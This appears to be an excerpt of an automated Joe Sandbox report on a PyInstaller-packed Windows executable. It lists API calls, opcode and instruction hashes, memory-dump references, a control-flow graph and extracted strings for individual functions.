                                                                                                                                                                                                                                                                                      • Instruction ID: 1b650c0e31b8721e017b0af88d963a610a528f0ca67c809660a10f3d39ba552e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A641F722B1960241EB16EB16DC02775A299BF49BA0FC9453BDD1D57384DFBCE405C326

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(?,00007FF7E12C3804), ref: 00007FF7E12C36E1
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7E12C3804), ref: 00007FF7E12C36EB
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12C2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7E12C3706,?,00007FF7E12C3804), ref: 00007FF7E12C2C9E
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12C2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7E12C3706,?,00007FF7E12C3804), ref: 00007FF7E12C2D63
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12C2C50: MessageBoxW.USER32 ref: 00007FF7E12C2D99
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                                                                                      • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                                                                      • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                                                                                      • Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                                                                      • Instruction ID: 971a2f209c4a8f0fc8bffeea66a44aced6b79d9d314c46b23a61a96cf6deef61
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8C219651B1854241FB25B724EC063B6A258BF84354FC08133E75E825D5EEBCE108C322

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 901 7ff7e12dba5c-7ff7e12dba82 902 7ff7e12dba84-7ff7e12dba98 call 7ff7e12d4ee8 call 7ff7e12d4f08 901->902 903 7ff7e12dba9d-7ff7e12dbaa1 901->903 919 7ff7e12dbe8e 902->919 905 7ff7e12dbe77-7ff7e12dbe83 call 7ff7e12d4ee8 call 7ff7e12d4f08 903->905 906 7ff7e12dbaa7-7ff7e12dbaae 903->906 925 7ff7e12dbe89 call 7ff7e12da8e0 905->925 906->905 908 7ff7e12dbab4-7ff7e12dbae2 906->908 908->905 911 7ff7e12dbae8-7ff7e12dbaef 908->911 914 7ff7e12dbaf1-7ff7e12dbb03 call 7ff7e12d4ee8 call 7ff7e12d4f08 911->914 915 7ff7e12dbb08-7ff7e12dbb0b 911->915 914->925 917 7ff7e12dbe73-7ff7e12dbe75 915->917 918 7ff7e12dbb11-7ff7e12dbb17 915->918 922 7ff7e12dbe91-7ff7e12dbea8 917->922 918->917 923 7ff7e12dbb1d-7ff7e12dbb20 918->923 919->922 923->914 927 7ff7e12dbb22-7ff7e12dbb47 923->927 925->919 930 7ff7e12dbb7a-7ff7e12dbb81 927->930 931 7ff7e12dbb49-7ff7e12dbb4b 927->931 932 7ff7e12dbb83-7ff7e12dbbab call 7ff7e12dd5fc call 7ff7e12da948 * 2 930->932 933 7ff7e12dbb56-7ff7e12dbb6d call 7ff7e12d4ee8 call 7ff7e12d4f08 call 7ff7e12da8e0 930->933 934 7ff7e12dbb72-7ff7e12dbb78 931->934 935 7ff7e12dbb4d-7ff7e12dbb54 931->935 962 7ff7e12dbbad-7ff7e12dbbc3 call 7ff7e12d4f08 call 7ff7e12d4ee8 932->962 963 7ff7e12dbbc8-7ff7e12dbbf3 call 7ff7e12dc284 932->963 967 7ff7e12dbd00 933->967 938 7ff7e12dbbf8-7ff7e12dbc0f 934->938 935->933 935->934 939 7ff7e12dbc11-7ff7e12dbc19 938->939 940 7ff7e12dbc8a-7ff7e12dbc94 call 7ff7e12e391c 938->940 939->940 943 7ff7e12dbc1b-7ff7e12dbc1d 939->943 953 7ff7e12dbd1e 940->953 954 7ff7e12dbc9a-7ff7e12dbcaf 940->954 943->940 947 7ff7e12dbc1f-7ff7e12dbc35 943->947 947->940 951 7ff7e12dbc37-7ff7e12dbc43 947->951 951->940 956 7ff7e12dbc45-7ff7e12dbc47 951->956 958 7ff7e12dbd23-7ff7e12dbd43 ReadFile 953->958 954->953 959 7ff7e12dbcb1-7ff7e12dbcc3 GetConsoleMode 954->959 956->940 961 7ff7e12dbc49-7ff7e12dbc61 956->961 964 7ff7e12dbe3d-7ff7e12dbe46 GetLastError 958->964 965 7ff7e12dbd49-7ff7e12dbd51 958->965 959->953 966 7ff7e12dbcc5-7ff7e12dbccd 959->966 961->940 971 7ff7e12dbc63-7ff7e12dbc6f 961->971 962->967 963->938 968 7ff7e12dbe63-7ff7e12dbe66 964->968 969 7ff7e12dbe48-7ff7e12dbe5e call 7ff7e12d4f08 call 7ff7e12d4ee8 964->969 965->964 973 7ff7e12dbd57 965->973 966->958 975 7ff7e12dbccf-7ff7e12dbcf1 ReadConsoleW 966->975 970 7ff7e12dbd03-7ff7e12dbd0d call 7ff7e12da948 967->970 981 7ff7e12dbe6c-7ff7e12dbe6e 968->981 982 7ff7e12dbcf9-7ff7e12dbcfb call 7ff7e12d4e7c 968->982 969->967 970->922 971->940 980 7ff7e12dbc71-7ff7e12dbc73 971->980 984 7ff7e12dbd5e-7ff7e12dbd73 973->984 976 7ff7e12dbcf3 GetLastError 975->976 977 7ff7e12dbd12-7ff7e12dbd1c 975->977 976->982 977->984 980->940 989 7ff7e12dbc75-7ff7e12dbc85 980->989 981->970 982->967 984->970 991 7ff7e12dbd75-7ff7e12dbd80 984->991 989->940 994 7ff7e12dbd82-7ff7e12dbd9b call 7ff7e12db674 991->994 995 7ff7e12dbda7-7ff7e12dbdaf 991->995 1000 7ff7e12dbda0-7ff7e12dbda2 994->1000 996 7ff7e12dbdb1-7ff7e12dbdc3 995->996 997 7ff7e12dbe2b-7ff7e12dbe38 call 7ff7e12db4b4 995->997 1001 7ff7e12dbdc5 996->1001 1002 7ff7e12dbe1e-7ff7e12dbe26 996->1002 997->1000 1000->970 1005 7ff7e12dbdca-7ff7e12dbdd1 1001->1005 1002->970 1006 7ff7e12dbdd3-7ff7e12dbdd7 1005->1006 1007 7ff7e12dbe0d-7ff7e12dbe18 1005->1007 1008 7ff7e12dbdf3 1006->1008 1009 7ff7e12dbdd9-7ff7e12dbde0 1006->1009 1007->1002 1011 7ff7e12dbdf9-7ff7e12dbe09 1008->1011 1009->1008 1010 7ff7e12dbde2-7ff7e12dbde6 1009->1010 1010->1008 1012 7ff7e12dbde8-7ff7e12dbdf1 1010->1012 1011->1005 1013 7ff7e12dbe0b 1011->1013 1012->1011 1013->1002
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 1c0df5e74df0118619baac061aee596465bcef498cfc928fc9eaa168a483e3b3
                                                                                                                                                                                                                                                                                      • Instruction ID: e7d519d65b728c48832a4c23c7b796c3002ee6340edb93491681c20126f4e3bd
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1c0df5e74df0118619baac061aee596465bcef498cfc928fc9eaa168a483e3b3
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BFC1E423B0C68695E760AB15D8163BDAB58FB86B80FD54133EA4D03791CEFEE4458723

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 995526605-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
                                                                                                                                                                                                                                                                                      • Instruction ID: 8bc466157fc79f4e4760f11b050d3a7fb52429372c27907ffbf0425d94d04ff1
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AC217331B0C64246EB10AB55F94532AE7A8FF817A0F918237EA6C83AE4DEFDD445C711

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12C8570: GetCurrentProcess.KERNEL32 ref: 00007FF7E12C8590
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12C8570: OpenProcessToken.ADVAPI32 ref: 00007FF7E12C85A3
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12C8570: GetTokenInformation.KERNELBASE ref: 00007FF7E12C85C8
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12C8570: GetLastError.KERNEL32 ref: 00007FF7E12C85D2
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12C8570: GetTokenInformation.KERNELBASE ref: 00007FF7E12C8612
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12C8570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7E12C862E
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12C8570: CloseHandle.KERNEL32 ref: 00007FF7E12C8646
                                                                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,00007FF7E12C3C55), ref: 00007FF7E12C916C
                                                                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,00007FF7E12C3C55), ref: 00007FF7E12C9175
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                                                                      • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                                                                                      • API String ID: 6828938-1529539262
                                                                                                                                                                                                                                                                                      • Opcode ID: 5ed7a9ba3e6ce910408607b93085540bd422a8d0f9e00f9f84049ca226c14b37
                                                                                                                                                                                                                                                                                      • Instruction ID: 395dd86bfe94c07938228bacbb809f435052dff1d1ec76479bf52faa911c552e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5ed7a9ba3e6ce910408607b93085540bd422a8d0f9e00f9f84049ca226c14b37
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4E213021B0864282EB11BB10EC163EAA259FF84780FC54437EA4E57795DFBCD545C761
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CreateDirectoryW.KERNELBASE(00000000,?,00007FF7E12C352C,?,00000000,00007FF7E12C3F23), ref: 00007FF7E12C7F32
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CreateDirectory
                                                                                                                                                                                                                                                                                      • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                                                                      • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                                                                                      • Opcode ID: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
                                                                                                                                                                                                                                                                                      • Instruction ID: 9a4e7b05101842aef7faa12c2d713a7c4cedb021190bbde38b64aaf5e32ed831
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1431C321719AC645EB61AB20EC523EAA258EF84BE0F844232EB6D477C9DE7CD601C711
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E12DCF4B), ref: 00007FF7E12DD07C
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E12DCF4B), ref: 00007FF7E12DD107
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 953036326-0
                                                                                                                                                                                                                                                                                      • Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                                                                                      • Instruction ID: c5de0c1b016dee6c47ffbce7ae589440efd151e77c4f1596e05190f260b07dbd
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C491C523F18A5646F760AF65D8423BDABA8EB40788F94413BDE0E566C5CFB8D441C722
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 4170891091-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                                                                      • Instruction ID: af7e52b8bf652f0943a9ff1549d97317046fe9f25e8a1db069cdcf1377013d55
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 95511673F042118AEB14EF64DD527FCA7A9AB4835CF900236DD1E52AE5EB78A803C715
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2780335769-0
                                                                                                                                                                                                                                                                                      • Opcode ID: f2931e55a17fed7c801103cab28c1f7fd047901bf7fa79ea6702d423310ad099
                                                                                                                                                                                                                                                                                      • Instruction ID: 68d407348311a22b462f5e677f37e7a4871fb1f43063355b534e63c4c1ebbdaf
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f2931e55a17fed7c801103cab28c1f7fd047901bf7fa79ea6702d423310ad099
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1519263F046418AF710EF70D8523BDA7B9BB48758F908436DE0D97688DFB8D4808762
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1279662727-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 8f3d5377b4ca72f71b0fe910297a4b2920b1cd85568e136600ee028e7f718979
                                                                                                                                                                                                                                                                                      • Instruction ID: e07611010984c9507fef69f2c8b75ea74036e99cd747d787f63fc1a18644f364
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8f3d5377b4ca72f71b0fe910297a4b2920b1cd85568e136600ee028e7f718979
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2941A363E1878187F714AB20E911369A264FB943A4F509336E69C03AD5DFFCA5E08751
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3251591375-0
                                                                                                                                                                                                                                                                                      • Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                                                                                      • Instruction ID: 958985c6d6ec0a8b3db471f2ef67f5c222c36460162f58a3485d614efc59f2ee
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 83310821F0854741EB15BB659C233B99689AF81344FC85037EA0E572D7DEFDA914C363
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
